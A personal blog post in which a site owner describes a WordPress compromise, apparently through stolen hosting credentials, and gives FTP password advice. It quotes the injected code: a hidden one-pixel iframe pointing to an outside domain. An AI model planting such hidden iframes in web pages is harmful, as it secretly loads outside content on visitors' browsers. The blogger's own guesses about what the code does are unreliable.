Everyday you learn something new…some frequent visitors to this site may have noticed that for the best part of a week, 14degrees.org was not online. This was due to what I assume was a kind of ‘hacking robot’.
One day I go to access the website, and I got a parse error, which meant that nothing on the site displayed at all. This is actually quite handy, because if my site had been all HTML, I may not have noticed that something was amiss. The reason I got the error is because this site is running on WordPress – a content management software. If any of the files are tampered with in WordPress, the whole thing just stops working.
So to cut a long story short, somehow a hacking program got a hold of my web hosting password and username, and added code into all my webpages. This is the code:
iframe marginwidth=”0″ marginheight=”0″ src=”http://196.regvista.com/index.php?ref=r22″ mce_src=”http://196.regvista.com/index.php?ref=r22″ width=”1″ height=”1″
When a page with this code is opened, crazy stuff happens. The page seems to keep re-loading. It seems as though it is an invisible ad banner than automatically ‘clicks’ repetitively? I dunno. I’m not up with the play with these things.
But anyway, I ended up deleting everything on my web hosting account, and re-installing wordpress (the rouge code was in everything). As you can see things are back to normal again. I’ve still got to clean up some stuff on the Japanese version of the site, but that shouldn’t take long.
The moral of the story is:
- Don’t use FTP software. Apparently when they go to access your account, they send the password and username in clear text – not encoded.
- If using FTP software (for transfering lots of files in one go) then make sure you change your password immediately after doing the transfer.
The hosting company that I have my website on includes many good features, one of them being a file uploading tool and file editor. I’ll be using this as much as possible in the future, so as to avoid any repeats of last week’s fiasco.